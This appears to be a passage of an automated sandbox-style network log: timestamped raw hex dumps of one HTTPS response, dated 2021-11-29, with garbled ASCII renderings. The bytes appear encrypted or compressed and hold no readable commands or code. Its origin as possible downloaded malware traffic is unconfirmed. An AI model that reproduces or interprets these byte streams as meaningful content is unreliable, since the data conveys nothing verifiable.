                                              Data Ascii: -9eaW|ggm,j@N&33TfT^eqXK5~cA={*?T}e@h*K?c`<Q-#l%:ZG]v5yIhb UpK?9"Eov#|2%)jA&iAR1lllSW=yfS{C
                                              2021-11-29 10:29:51 UTC182INData Raw: 4f 89 4e 88 7c b5 26 67 3a da ef 14 26 ef 4d 6a 58 30 c5 eb e8 c6 49 88 76 89 4e ce 81 ed b1 96 8b 28 9e c5 f8 17 2b 4b e3 3b a9 37 0b 18 36 6e 97 de 11 8b 31 22 83 18 d3 e6 1a e8 31 8b 10 39 c8 08 eb cb 7c 7a d7 12 6b fe e7 47 0f a7 04 84 3d 2a 3c 3a e0 b2 fe 1e 66 cd a5 19 24 57 e7 f8 5b 1c e6 e2 9b 67 aa a5 05 f8 3f 58 e0 ec 60 11 33 55 27 27 0c 10 2e 91 c9 c3 d5 27 6b ee 12 7a 28 7f 98 a0 68 b1 c5 85 68 3e dd bf 03 58 77 c0 78 9c 1c 3c 32 b8 b3 87 cf db 93 0b 8b 34 a5 7f c3 d8 32 da 71 3d b0 ea b3 a4 d0 e8 33 e6 1e cb 8f f5 ea 22 ef 27 af d3 4b 36 b9 f9 d1 41 e8 71 5f 83 3a 5d 51 e2 9e 39 d5 15 bf c7 a4 27 99 78 87 93 02 e3 78 da 51 b5 97 4b 31 56 0f 13 99 dd 96 f2 86 d9 fe 19 69 0a fe 58 9d aa ac 79 2c 61 9b f3 b8 12 bd d3 d5 bf c1 d0 89 64 9c af bf
                                              Data Ascii: ON|&g:&MjX0IvN(+K;76n1"19|zkG=*<:f$W[g?X`3U''.'kz(hh>Xwx<242q=3"'K6Aq_:]Q9'xxQK1ViXy,ad
                                              2021-11-29 10:29:51 UTC183INData Raw: a1 1c b8 b1 fa eb 5e e3 2a d0 f3 23 e9 6b 0a fe 91 27 89 71 6d 47 80 c5 ea bb f4 7f 9f 5d 4e 9d 07 f0 a5 ed c5 df f9 e6 76 9d a9 75 10 23 19 3c 49 6e 90 02 6d 12 68 a8 24 bc 60 7e da c0 2f dc c3 f9 88 60 9f c0 b0 c5 93 78 19 a8 02 b9 d6 fe d3 50 7c 21 bb 3e 5b 32 df e3 d1 37 90 a5 9c e9 a7 6c ad 2e 59 58 e1 65 45 46 8b e9 d7 ee 9b 7d 3e 8d 23 88 ec 01 3f db 92 14 02 5c 10 fd 71 45 aa f3 89 3d 1c 8f b4 f6 18 83 03 31 87 76 ef f4 a1 bd 98 32 60 a1 b2 fd 55 e3 12 1b bb 2a b9 f7 56 8b 84 88 96 b8 2a 5a b7 18 8d 18 b9 23 f1 92 21 17 69 3b 4a d2 6c 80 ce 92 a0 b0 65 87 7c 74 52 9c fc 06 88 95 81 ec e7 7f 5f 27 50 61 39 07 38 0a f4 07 b3 fa d7 dd 2e 65 db 3d bb c5 a7 99 ee c3 09 48 61 d2 ad 07 30 c3 73 6d 2f b8 52 ea 46 86 1b 42 1f b7 bb a6 7d f0 de 50 38 34 c6
                                              Data Ascii: ^*#k'qmG]Nvu#<Inmh$`~/`xP|!>[27l.YXeEF}>#?\qE=1v2`U*V*Z#!i;Jle|tR_'Pa98.e=Ha0sm/RFB}P84
                                              2021-11-29 10:29:51 UTC184INData Raw: d8 d7 a6 46 f5 80 9b 94 75 d7 db 68 19 68 b4 18 02 e1 4c 92 3f 2e c8 ca f1 2e 12 f4 40 33 11 ba 36 d6 22 9e 65 ee ba 92 17 37 e7 a9 25 5c dd be d2 dd 5f a8 75 34 03 49 c6 5d b3 fc 12 e6 c7 b9 a1 01 ab f6 bf f3 b9 a2 09 f5 f3 ef 70 c6 f6 a1 63 45 c3 b1 02 c9 e0 37 48 c1 01 83 c4 a3 94 6c 94 81 f9 51 55 5f 85 07 5b 33 41 73 56 ef 62 7d c0 23 e1 e9 ae 71 25 ad 37 8f 37 aa 42 a7 a9 ab e0 64 e1 e0 ed 3f 1e 90 7f 79 45 8e be 62 61 9d 0d f7 b1 af 50 dc eb ea 46 86 a8 2c 28 ae 02 2d 5e d3 f5 d8 c4 d9 ab fb 37 11 62 2b 5e b9 91 a4 cc e0 38 d2 e8 fb 68 ee 48 3c 02 9a 27 96 b4 82 5f 06 30 9f 97 34 d3 84 55 7f eb e8 39 e5 57 7d 3e ed 8b b3 6c 95 dd c2 36 d3 43 27 3b b8 15 ed 9d 5f a5 9f 8d df a7 6f 0c b3 07 d9 86 77 80 5e 2c af fa 25 fb 11 6c ec 15 25 00 28 43 cf d9
                                              Data Ascii: FuhhL?..@36"e7%\_u4I]pcE7HlQU_[3AsVb}#q%77Bd?yEbaPF,(-^7b+^8hH<'_04U9W}>l6C';_ow^,%l%(C
                                              2021-11-29 10:29:51 UTC186INData Raw: 03 a3 db e9 ff a5 25 b3 c1 9f 48 5e 40 4b ec 7d 25 03 57 2d 66 0f e8 d0 86 8b cf f9 3b c3 40 eb ca dc af 65 36 50 40 d3 1d ea 1c 8b 2f f4 bd 1b bf 6a 2f d3 31 50 c9 11 b5 17 90 9c ae 10 d0 9d e5 57 4b 1e df e6 a5 fc ec 4f f4 4e ed b4 b7 e7 70 dc 4e 92 15 06 30 4d 17 58 b7 0d e9 00 c5 af 1c 0b 98 34 11 81 90 b1 3e 43 2a a9 dc 1e 83 56 60 8c e4 a9 4a 0b d1 fe 6c 85 da f7 1f 4c 7b 3a c7 d3 9b 1a 03 f9 89 db 23 2e 9c 96 9e d7 a5 d7 6f 6b f3 2e 45 33 a3 e2 10 40 df c7 e5 e0 cf fe 31 af cf 28 02 c2 c3 9a a3 ab c3 e6 9f 9b 36 63 a7 75 fc d9 cc 9d 43 74 cd 33 28 27 54 c5 12 33 b1 2f 57 a8 b9 59 32 12 07 28 ea 51 a2 f2 b5 23 11 15 1d 8e 63 03 25 77 76 b1 9e 21 1d d4 2c ce 57 bb 07 93 76 8b e3 6c 7d 07 dc d4 4e 0c 64 20 36 b3 d9 d0 11 fa e4 73 ea 69 61 97 60 55 fb
                                              Data Ascii: %H^@K}%W-f;@e6P@/j/1PWKONpN0MX4>C*V`JlL{:#.ok.E3@1(6cuCt3('T3/WY2(Q#c%wv!,Wvl}Nd 6sia`U
                                              2021-11-29 10:29:51 UTC187INData Raw: ef 1a 67 39 b1 14 d1 2e ae bb 48 6b 57 d2 98 90 21 05 88 8e 89 17 9f 7c 02 04 d9 84 d0 ac 83 38 36 00 39 d4 4a d0 e6 6c ef 8c 3b df ba 6a ba 84 d4 9f fe c6 7e ae 22 ca 4b 51 49 02 aa a2 0c 85 b1 6c 3b 65 ea aa 7c 53 d9 ad 00 2d 88 3e 7c b4 a8 56 19 ab fd f2 78 0a bf 06 e1 cf 47 88 04 fc 71 b7 78 f6 56 9e f4 c8 b5 eb db 42 4a 8b f2 61 8a 75 2f 8e 41 85 72 a0 83 8c 50 ee db d0 ed 58 e8 27 65 f6 3f d0 84 ca 07 be b2 47 36 9d a1 b1 e8 1e 72 03 df e5 ae 88 b3 d0 7f 7f 89 a4 b8 cd 43 93 dc 12 26 ed c4 bc 3c b0 35 ae af ce b3 f7 2c a0 c5 f7 ef b9 cc 9a f4 3f 6f 91 c1 9a 93 d8 49 e4 7e 62 a3 13 97 61 c1 3f 32 de a3 d2 06 ca 6f 9c bc 29 a0 84 ef 78 9a 13 40 7f a9 1c a0 25 23 54 7a 13 e7 01 d4 7c 79 b1 0d d0 10 5c 67 29 2c be d8 1b 81 53 1e 39 50 5c 8e 83 42 58 4f
                                              Data Ascii: g9.HkW!|869Jl;j~"KQIl;e|S->|VxGqxVBJau/ArPX'e?G6rC&<5,?oI~ba?2o)x@%#Tz|y\g),S9P\BXO
                                              2021-11-29 10:29:51 UTC188INData Raw: d0 95 18 1e e8 9f 56 84 5b e2 4a 26 c9 3d 0a 7c 09 e8 fa d9 e5 3e 40 f0 e1 ad 39 eb fa eb 3a eb c0 f7 12 06 1e 1c 04 d3 ed 23 54 f0 16 45 93 7a a2 8a 12 64 9e fd bb 3d b2 16 99 fc 67 21 e5 7c ee bc 49 e2 89 d9 42 a2 ad 4a 26 57 ce 0c a7 e2 3d f2 17 fa 21 18 89 21 c3 77 7d a3 21 42 aa 61 5f fa 9f 12 63 d6 f8 b4 55 d2 46 55 36 aa 56 ba 0e 02 e5 78 40 bc c1 2e 64 a6 d4 b7 5c 44 d4 0a f8 50 ce 86 4d f0 b0 ba b6 a7 d1 ae 5f bf 49 07 7b c1 a5 17 d1 28 7a dd 5a 61 55 ef 9a 9e 45 b6 33 9d fa 76 0f 95 61 8c 53 9e 28 6f c2 7f 14 62 94 27 a4 33 67 5e e6 66 d8 65 68 ea f9 4c 4f 7d 11 a7 ec 31 9a 54 3b 35 8a 7f 5a 22 5e 94 ae aa ce 6e da 4f a7 2c 5e 6e 85 eb cc c8 93 a3 9d e9 a3 42 34 0c 90 e4 fd e0 b7 26 6f 06 db c2 99 a1 37 ab 40 03 f0 ac 68 e6 f5 d0 e2 1f 08 e2 92
                                              Data Ascii: V[J&=|>@9:#TEzd=g!|IBJ&W=!!w}!Ba_cUFU6Vx@.d\DPM_I{(zZaUE3vaS(ob'3g^fehLO}1T;5Z"^nO,^nB4&o7@h
                                              2021-11-29 10:29:51 UTC189INData Raw: 31 b8 5a 15 8e a6 24 bd c7 f9 41 0d 14 2c f4 d0 f9 88 f0 8c 46 ea ac 4c 6e 18 23 0b a2 36 f6 92 17 02 59 7f e1 d2 bc a9 7a 85 0b ad 2f 82 26 63 f6 db b5 12 00 82 be ec 8e 49 7a 32 7c 60 2e 53 f2 1d b5 01 4c f3 d6 d0 81 61 31 19 1c 95 34 98 7d d6 44 4a cf d7 dc 05 0c db 90 2e f3 bd b7 ff 79 86 c0 4d 56 ad 6f a6 0e 9a 33 48 29 35 db 6c 16 8e 7b 0e 20 e8 13 d5 7a 98 08 08 c0 31 b1 5e 2d 56 00 6c 8f d2 7f 8b 4c e1 46 4a 75 63 69 9e 8c 08 d6 ad 7c 8c e3 b0 1a 63 cf d8 93 11 e4 f4 fe 70 29 36 a4 c5 d8 c6 de 8c d1 a0 b1 ed 2a ed 8d b3 df 32 90 df 5c 1c 5a 50 3b 02 57 37 15 03 5c 6e b9 ff e4 89 48 23 34 04 a9 e1 e6 e8 a8 83 59 24 d2 0a 49 e5 ff 42 84 13 ad f0 4d 44 cf a3 72 9c 1e 2c f7 02 90 b3 5f 19 f4 cc 5a 03 5f 52 9e f9 d8 24 04 e3 ca 63 6d 80 59 e9 b0 5e 3b
                                              Data Ascii: 1Z$A,FLn#6Yz/&cIz2|`.SLa14}DJ.yMVo3H)5l{ z1^-VlLFJuci|cp)6*2\ZP;W7\nH#4Y$IBMDr,_Z_R$cmY^;
                                              2021-11-29 10:29:51 UTC191INData Raw: 97 c5 24 ac 4f 89 b7 ff 88 82 47 29 70 b6 5f 08 32 d2 ac a6 03 dc 7a fc cb 01 d9 18 09 bb 7f b1 30 94 e3 d5 82 eb 12 c9 5b 39 d8 bd 9a 96 6f d6 85 20 3e 9b 28 36 63 b7 b6 55 7f ef f2 ac 5e 55 cf ea 0e a0 e9 91 12 c2 db c9 1f 70 28 ba 44 fd 18 5f d0 8a cf f1 5a 63 cb e1 96 cc 48 73 52 5f 40 89 0f 27 ca 10 90 9a 04 25 29 29 21 c8 7b cd d6 f1 70 93 57 b3 d0 a4 86 36 69 d9 81 56 a0 9b 63 46 16 79 77 c2 6e d0 cb 79 b3 90 6c fd a0 b1 d9 ac 68 34 7a b0 03 cc 78 ea 1b d1 a4 6e 69 6c 03 fa 65 37 36 4d d7 44 22 eb bd ff aa 7e 0f 47 86 9b b4 f3 4c e7 3a d8 3e a2 48 b8 ba 75 bf 20 4c 03 34 45 d4 01 5a 41 44 a9 1d bf 63 6d 60 ea 95 df 9a dc 90 22 f9 c1 06 eb 95 78 64 bf a9 8b 8e fa d2 12 c4 09 9f 3f b4 36 20 d2 8b 31 8c a4 b1 bc be 46 9c 2a ff 4e 18 78 12 44 c1 f2 98
                                              Data Ascii: $OG)p_2z0[9o >(6cU^Up(D_ZcHsR_@'%))!{pW6iVcFywnylh4zxnile76MD"~GL:>Hu L4EZADcm`"xd?6 1F*NxD
                                              2021-11-29 10:29:51 UTC192INData Raw: d7 6b d0 71 dc 24 3a ce a8 40 89 e4 a1 ce 9c fe b5 e7 0c 04 42 c2 7e 9a bd aa 65 e4 f1 9b 7a 3c e6 75 ef d9 47 9d af 72 30 31 79 27 6e 9a 63 33 6a 2f a2 a8 3c 58 f8 10 19 28 6c 0e bd f2 dc 23 f4 15 ca 89 05 01 73 77 85 ee 1f 21 06 d4 96 ce 04 ba 9a 91 4e 8b b7 33 fc 07 99 d4 51 0c 4e 27 d6 b0 04 d0 c3 a5 a3 73 4b 69 3c 97 67 57 bc ad 00 4b 73 2f 5a 3f 56 0e 6e 22 20 e3 a4 53 9c 9f f9 43 3e 35 a6 42 e6 e4 9b 7d aa 02 20 78 c9 c7 a8 88 ae d7 7f 72 56 82 05 94 71 86 9c 68 19 69 09 18 1f e0 aa 91 51 2e 7c 9b d3 2f 01 f4 cb 33 9d bd fb d4 1a 9e ef be 93 92 52 37 31 a8 ad 5d 26 bc cf dc a0 f9 6a 34 63 48 7b 5d d6 fb 74 e5 91 b9 ea 53 09 f7 94 f3 6a a2 04 f5 3e ed 48 c6 19 f2 72 45 de b1 74 c8 9d 30 eb c3 7c 81 86 f1 8b 6c 94 83 44 51 2f 5d 40 07 fd 38 76 21 74
                                              Data Ascii: kq$:@B~ez<uGr01y'nc3j/<X(l#sw!N3QN'sKi<gWKs/Z?Vn" SC>5B} xrVqhiQ.|/3R71]&j4cH{]tSj>HrEt0|lDQ/]@8v!t
                                              2021-11-29 10:29:51 UTC193INData Raw: 07 0b 78 00 e1 ea 81 b5 fe d3 c2 72 e3 b5 3e cd 6d 8d 22 39 35 ed 50 8f 7f b8 6c ad 98 c7 62 e6 72 a3 00 fe d3 8b a8 99 91 2d bc aa 88 9b 0d d0 d1 f1 14 61 b4 3a ea 52 45 3c 84 f0 e6 e7 8d c9 90 b9 d8 22 31 87 57 65 36 0e be 7e fc 36 4f 3d bb 57 53 1d af 04 2a 7d 34 9d 45 e4 88 5f f3 03 e0 9e 18 1b ec 54 15 09 90 5c 22 8f bf 46 d2 6c 3b 51 50 94 a9 83 4d 02 b6 51 db fe c1 ab 57 19 ee f2 7f b9 26 2d 63 16 45 3a 0f f4 05 25 fc 19 c0 c8 65 a6 3a eb 8b a5 9b ee cc 9f 43 5e d4 4b 11 4d ce 01 2b 2d ad 52 e7 d0 84 8b 4f f9 ba c6 a7 e9 a0 dc 5f 38 36 50 3d d3 9a ea 0d ba b7 f6 d3 1b 9f 34 52 d3 22 50 5d 11 6d 13 63 9e d2 10 8c c2 f2 57 49 1e 69 e7 8f cd 0b 4d a8 4f 9f ea b7 e7 52 dd c1 92 15 00 f5 4e 73 58 32 53 cf 01 de af 8b 0b ac 07 ec 83 ef b1 b0 1c 35 a9 dd
                                              Data Ascii: xr>m"95Plbr-a:RE<"1We6~6O=WS*}4E_T\"Fl;QPMQW&-cE:%e:C^KM+-RO_86P=4R"P]mcWIiMORNsX2S5
                                              2021-11-29 10:29:51 UTC194INData Raw: 44 67 84 6b 0b fe f7 26 84 65 89 45 0c c4 e2 fe f7 7f 6d 5c a9 9d ea f2 bb ee cb df 63 a3 8d 9c da 75 84 23 5b 29 da 6c ec 02 2b 56 1f a8 26 bc 0a 7f b4 c3 c8 de 43 f8 20 25 9f c0 4e c4 7c 78 01 be 1b ba d2 fe d1 16 5d 23 c0 3e cc 32 b6 e2 4c 35 ef a5 98 ad d8 6c ac 2e e9 5a 85 72 a1 44 d1 eb ea a8 98 7d 16 8f ca 88 99 02 f0 db 6e 14 60 1a 38 ff f0 45 26 f3 87 28 b1 89 d2 f6 13 c7 4a 35 b6 76 47 f7 b5 ba 4f 30 5d a2 a2 bf 66 e3 50 18 94 2e 4c e0 f4 8a 42 8c 6b fe 5c 59 8b 1b 22 18 2a 23 b8 90 11 17 c2 79 e7 d2 35 80 3c 8b e8 a9 13 9c 87 6d 30 c2 82 1f d8 95 4e f5 98 7b c8 25 55 61 69 40 69 0b 1b 06 d3 fb 4f c1 b3 61 ec 3a b1 85 c4 9e 81 c4 2f 4f 8f d1 61 0d 7c c9 44 21 3e a8 75 fa a9 94 c5 4a 67 a1 6e b2 5f a3 18 44 ea 20 8c 54 21 9f e2 1a d5 d2 8b db 97
                                              Data Ascii: Dgk&eEm\cu#[)l+V&C %N|x]#>2L5l.ZrD}n`8E&(J5vGO0]fP.LBk\Y"*#y5<m0N{%Uai@iOa:/Oa|D!>uJgn_D T!
                                              2021-11-29 10:29:51 UTC195INData Raw: ec 59 2b 68 63 7c 2c 81 da f9 71 1c 61 f0 96 5c 7c 91 ba 00 8f bc 9d bd 3c ec c0 cc d7 f4 63 19 26 c0 d0 6e 09 bc da ae d6 8b 44 06 03 1b 35 3c f7 ae bd 8a ce 8a 9d 53 fd 99 ea ba 41 d6 f7 c6 15 bf 68 a7 bd ba 0f 31 f0 83 94 9d d9 79 c0 b7 4f b1 95 ba f3 15 c2 e0 03 24 0f 0d 02 6c 54 53 01 21 10 86 01 09 3f 4c 8e 81 3a 0a 38 9f a3 84 55 99 42 f3 50 fe 32 08 73 d4 a4 3f f9 a7 1c 1d 0c e0 5c 54 7f 96 bf 9a 85 c1 f2 b8 dd ea 0b c2 0b 2c b2 c9 85 4b 76 9a 6c fe f7 ef ab af ce 44 4e 51 cc 8a da a4 86 d6 5b b6 a1 95 8a df 8c 3e b0 f7 13 f8 fa e0 6b 06 78 d2 40 77 3b d8 f2 4f a3 de 62 d1 30 09 61 b8 49 f5 48 96 07 8d 24 b7 4a 18 5c 86 15 af 4a 5f fa c8 6b 99 9b 6f d7 a1 05 9f c7 77 51 1f 7c e4 5d 27 e7 50 ac dd 56 25 63 69 d5 ab 84 e5 28 93 f9 c7 9b d4 1c cf e0
                                              Data Ascii: Y+hc|,qa\|<c&nD5<SAh1yO$lTS!?L:8UBP2s?\T,KvlDNQ[>kx@w;Ob0aIH$J\J_kowQ|]'PV%ci(
                                              2021-11-29 10:29:51 UTC196INData Raw: 00 0b d6 2a 50 4d a1 54 2a 4e ed 52 8e 85 86 ee 0c f9 d3 93 a6 8e e2 dc 12 6e 34 13 16 d3 cf bc 0f ff 9f f6 86 4d 9e 73 7b d3 79 06 5f 76 16 66 29 d7 85 10 e0 a6 93 08 02 48 49 87 ce cd 68 1b 89 2d de ea d1 b1 70 b9 8e 92 72 56 d6 28 3c 58 72 04 eb 43 92 af ce 5c 89 43 a0 83 ab e6 96 5a 7f a9 94 49 15 37 1c 8a 60 fc 37 68 4f a0 0a d2 da 92 de 4c 44 5f 21 b6 b1 1a ab cf f9 8c 23 63 65 e0 ae 97 2a b9 77 2e 86 26 47 71 fb e2 c5 18 2a b7 5b e2 f7 a6 1e b6 95 28 45 9a 55 d2 a0 aa 44 bc e2 f9 3f 3c c6 2d fc bd 02 9d 89 2a 2b 57 0d 27 40 c2 10 71 e8 2f 82 f1 27 1c 8d 10 3f 71 7f 48 f9 f2 f2 7a 87 5d 67 89 e4 58 58 15 99 ee ff 78 1d b0 e3 ce e2 e3 e1 f7 52 8b 53 6a 7f 45 86 d4 9b 56 3d 63 8a b1 e1 8a e8 e3 bc 73 ad 33 f7 df 78 57 7c f7 d3 29 6c 2f 9a 65 45 6a 29
                                              Data Ascii: *PMT*NRn4Ms{y_vf)HIh-prV(<XrC\CZI7`7hOLD_!#ce*w.&Gq*[(EUD?<-*+W'@q/'?qHz]gXXxRSjEV=cs3xW|)l/eEj)
                                              2021-11-29 10:29:51 UTC198INData Raw: ed 0e dd 99 06 e2 88 60 ab cb 18 72 3b 7c f4 71 4b c8 7e c8 da 17 42 65 5c 8a 9a ab 8c 0c 99 e9 ef f4 d7 0c d7 da 67 c5 96 80 39 cb fa 80 2f 07 16 6a 93 db b3 e2 78 25 cd 16 99 d1 c1 06 ed c8 7f 41 d5 5a e9 ee 80 22 bc df 20 99 0e 6f fe 60 42 9f 3a fe 36 98 96 f6 8e 97 0d fe 29 bd db 87 9e 27 8a ca 8b 10 c6 11 9d da 10 f2 7c d4 5b ca 3f 88 72 b1 25 0b dc 41 fa 99 12 a7 a6 bb 8a cc 9c 32 25 fb a5 b0 83 77 17 6d f7 89 da cc 9b d3 45 1b 4f df 73 a8 41 e1 81 50 50 ed e8 dc c6 c9 21 c8 5d bc 39 9f 17 a3 05 92 8d c7 c9 f7 1a 5b 8d f6 fa fe 66 bc b7 9b 7d 00 76 51 9c 12 2d 59 f3 9a 44 9e c4 a7 80 f2 ae 64 31 c5 13 1e 9d 6e f7 10 46 72 ca 70 bb 10 86 66 5e 43 5c 14 92 df e7 94 ed 31 8a 7e 3b c5 71 7a 7a 3e 45 17 d9 19 79 f7 10 2d a0 0d e2 34 f7 9a e0 c7 ec 72 04
                                              Data Ascii: `r;|qK~Be\g9/jx%AZ" o`B:6)'|[?r%A2%wmEOsAPP!]9[f}vQ-YDd1nFrpf^C\1~;qzz>Ey-4r
                                              2021-11-29 10:29:51 UTC199INData Raw: e5 5f f2 44 56 7f 54 b3 b7 b3 69 49 73 a9 c1 c1 d0 9b c0 92 2c a9 06 99 e3 47 39 69 f9 aa 3b 53 2f bf 56 29 6b 20 4a e2 91 02 53 a1 f1 54 33 74 47 86 42 75 90 0a 29 c6 53 97 0a af a4 c1 fd 3c b2 54 15 76 f6 b9 dd 9c f0 b8 1a 70 09 4c 6c 19 95 c6 e4 37 5c 04 9b 94 4b 66 ab 95 46 cf ce b5 ba 2b dd da d3 cc e7 65 52 71 ea df 2d 4f c9 dd b8 b3 b8 07 44 6f 20 33 3c e7 92 9b 8a f8 d8 dc 36 a9 b8 de 9e 4a ed a6 9e 70 8e 79 85 b6 9f 0d 20 a0 c5 fd a6 d8 72 cf b0 19 83 dd 85 e2 1c c3 e4 0d 03 0f 2e 13 6a 48 40 56 21 13 8a 16 2f 33 50 90 8f 26 00 3d ad e0 b1 5a d9 27 a7 7b c2 08 16 68 91 f5 3f ff b0 04 29 24 fc 5b 07 4b c4 8e 83 a9 dd f5 eb e9 a9 34 e3 5f 58 85 ac a9 5a 4f a7 6b e9 a7 aa df bf c4 7d 62 58 d9 cf 89 a4 93 d6 4e 99 8d 82 9c 81 db 4c 80 cb 2e f7 fa b4
                                              Data Ascii: _DVTiIs,G9i;S/V)k JST3tGBu)S<TvpLl7\KfF+eRq-ODo 3<6Jpy r.jH@V!/3P&=Z'{h?)$[K4_XZOk}bXNL.
                                              2021-11-29 10:29:51 UTC200INData Raw: 76 7c 2d 4d 18 94 ef c3 89 ed 38 fe 4e 3d b7 7f 7c 18 01 59 64 e4 39 7a ac 29 20 a0 09 e1 3c fb f4 ce 83 f6 64 00 00 8b 9f 62 ec fc 79 8b f2 35 dc 52 61 00 62 25 78 63 9a 63 4c 94 7e c7 9d 33 e0 05 ae ec c6 f6 8a aa f1 2f 5e 91 2e 71 08 ad 62 45 49 d1 3c 8d d0 d5 f2 2a 8d d0 ab 88 ad c5 bd 27 51 5a 37 6e 9a e6 8b 68 d3 a7 91 c0 5d ec 5b 40 91 50 23 3a 27 47 41 02 ec ba 7e f4 c3 b3 38 09 7f 3a 83 ae f9 59 39 fb 27 e6 8d b5 a2 03 bf b9 e2 71 44 b7 3b 0b 0b 44 21 82 6e a2 af df 65 ec 75 94 e2 9d d4 d2 7c 5c c8 8f 6a 67 3f 25 ed 02 ef 58 7c 76 cc 01 e4 be a4 fd 3e 4b 66 46 d1 a1 7f 9c f7 f9 b2 55 4f 7e f3 9b a3 2c b3 7b 07 9b 22 33 41 ca 8c e1 40 69 9c 6e 92 d3 8c 7b a3 b9 5a 6b ac 32 9a ac c5 76 90 90 f2 09 5b a5 32 99 ad 09 e9 9e 1b 45 56 55 74 52 f8 63 47
                                              Data Ascii: v|-M8N=|Yd9z) <dby5Rab%xccL~3/^.qbEI<*'QZ7nh][@P#:'GA~8:Y9'qD;D!neu|\jg?%X|v>KfFUO~,{"3A@in{Zk2v[2EVUtRcG
                                              2021-11-29 10:29:51 UTC202INData Raw: 4a 55 b0 de 8b 5b 4c b0 6d e6 c6 aa ce 8f fe 54 69 5e da d7 89 f7 a7 df 3a 90 85 fb bd 83 ba 7a 89 98 1f fb 8e 97 30 06 77 f2 01 7c 05 90 f5 14 fa 8d 31 c2 27 18 5f 80 1d d4 15 e2 64 82 2a a0 5a 27 4d ca 70 8c 66 5f fe ec 1f 8f bf 1c e2 8f 6b aa e3 24 62 2c 19 cd 71 27 c2 74 ca d3 76 51 65 7b a1 bd a0 84 02 f6 ea ef 80 ef 2c cd e1 6a ca a2 b1 25 ca f2 8c 41 11 0a 7a 80 c0 b8 d4 0c 1e db 23 91 a9 f2 36 f7 f3 79 5f c4 5a 9a cc b2 23 a2 ce 07 86 6b 47 9b 6a 48 99 1c d8 31 8f a0 f2 93 f6 18 fa 29 87 d1 b8 93 31 8e d5 df 05 c6 00 c2 fe 25 e7 51 c0 45 af 0b 88 76 8f 07 0b da 45 d1 f6 1c ae c3 aa b3 be 9d 3a 25 fa a5 c4 9a 4c 0c 65 d3 e4 c8 ce 8a 8c 5f 0a 44 d6 3e 9b 53 e7 8c 43 72 88 d1 f4 db c0 01 ad 49 aa 2c a7 34 ca 28 93 ba ec db ed 18 53 8d fa f8 fe 70 b8
                                              Data Ascii: JU[LmTi^:z0w|1'_d*Z'Mpf_k$b,q'tvQe{,j%Az#6y_Z#kGjH1)1%QEvE:%Le_D>SCrI,4(Sp
                                              2021-11-29 10:29:51 UTC203INData Raw: 4f 83 77 8b dd 90 1e b1 bf 4f 77 af 30 f4 8c e4 50 88 8e de 1f 5f c0 05 88 b0 35 f3 ec 3b 45 47 34 4b 4e fe 5f 43 d4 5d a0 dc 4e 37 ba 55 02 4b 1a 7e d4 9b da 4d 87 46 51 ea ee 64 2c 32 b8 8d f9 51 69 bd d5 a0 87 fb 93 f6 7e e6 51 5d 0b 42 a4 b7 bd 7c 49 4e bf df a4 b7 8d d1 b9 37 8f 1a 94 e5 4b 27 69 c4 bc 25 36 5c 9c 4b 1a 4a 16 51 e0 91 0e 23 96 f7 56 2d 15 52 86 36 7a b7 0c 1c dd 75 90 3c bf b4 d6 fa 27 a7 20 1b 7c ec e6 c7 8b f5 ad 0d 74 46 70 6d 34 94 c3 fd 27 00 22 f4 9d 5d 66 86 b7 5a d3 d9 b4 91 27 fb cc ca cc fb 78 59 71 ec d0 2b 52 ce c0 b3 b3 aa 03 46 6a 27 37 1e fc 96 84 85 c8 d0 dc 3c c7 f6 ed 86 41 a2 a3 91 61 b2 4e b2 ab 9f 2a 20 ba f5 fb be d8 30 c9 a6 08 dc c6 99 ff 0a e0 ca 0a 28 2e 32 14 6b 26 54 56 55 0b ae 0e 09 1d 46 99 a4 27 04 36
                                              Data Ascii: OwOw0P_5;EG4KN_C]N7UK~MFQd,2Qi~Q]B|IN7K'i%6\KJQ#V-R6zu<' |tFpm4'"]fZ'xYq+RFj'7<AaN* 0(.2k&TVUF'6
                                              2021-11-29 10:29:51 UTC204INData Raw: 73 0c 48 d8 6e ac 40 f3 8d 52 41 88 d7 bd ea cb 0f c2 4a aa 2a a8 13 d1 25 9b 8c e1 cd eb 7d 7b e3 c1 ed e9 02 9b b0 9b 57 0e 74 64 98 03 31 59 81 df 68 93 e3 a8 84 e4 83 6e 43 ea 17 0d 80 65 cc 7e 57 78 d5 4a f8 38 8e 62 6e 59 4f 0f e0 e3 ec 8b fe 3a 8c 6b 35 da 68 6e 6c 37 52 17 f7 39 63 dd 39 26 a1 3e e5 2b fd f6 df e6 f7 01 07 3a af a1 42 e6 e6 45 89 81 14 d5 53 48 13 16 13 5f 7e b7 6b 4c 8a 7b a8 a9 15 c2 6b 82 e7 d2 fc 9c c3 cb 27 12 b9 3c 60 3f c3 67 58 2d df 20 ea 93 ee f9 59 bd dc b4 a6 af db b3 3f 4a 34 13 32 b6 ea 9e 6a ea bb 99 aa 7e fd 40 68 a1 43 3f 2d 11 30 7e 13 ff a1 40 e1 ac 8d 32 28 6a 0c 94 ea a2 78 4d da 2b fc ba c7 88 1a b9 bb e6 51 72 a4 20 18 58 63 3c 88 6b a0 db cf 79 fb 69 85 83 8a d4 e2 42 66 dc b1 7c 70 24 0f ef 61 c2 5a 6a 74
                                              Data Ascii: sHn@RAJ*%}{Wtd1YhnCe~WxJ8bnYO:k5hnl7R9c9&>+:BESH_~kL{k'<`?gX- Y?J42j~@hC?-0~@2(jxM+Qr Xc<kyiBf|p$aZjt
                                              2021-11-29 10:29:51 UTC205INData Raw: 2b b5 d4 e6 ba df 5f c0 b0 7c d0 ec 82 e2 09 f9 af 3b 34 12 29 4d 57 43 54 46 4d 35 9d 27 05 26 51 85 93 3b 1a 37 c3 d0 dd 52 cf 36 f8 76 c5 18 0a 72 86 f5 76 c5 85 11 16 27 ef 44 2d 3b f3 99 94 b8 c6 e9 e0 9a ea 35 e3 4a 73 a9 c2 87 43 56 b7 67 c3 a8 9e c7 94 c3 70 6b 70 c8 de 9e c5 a0 da 55 bc 9b fb ad 97 c9 4a 81 f5 74 d5 e1 bd 31 63 53 eb 68 5b 06 e3 b3 0e f3 9c 3d fb 34 05 57 80 68 de 31 e3 4f af 26 b2 4b 1d 5a ea 70 89 62 2d dc ea 1f b4 b5 01 e1 e0 56 ad f4 1e 78 39 2f dc 70 4e f2 5e dc cb 7e 4a 6e 5b d5 9d a0 82 0a 8e c2 fa 80 d9 06 cd f6 25 cb 94 b1 08 e8 e1 8e 34 22 0b 03 97 d1 a3 d8 3b 04 df 30 8f a9 f2 36 f7 e2 74 4f c3 4c e9 ff 84 23 99 c6 07 8c 0e 4f 90 64 48 8f 00 f9 36 fd 96 ea 8d 82 1a f2 73 8c f4 85 97 31 9c b8 8d 17 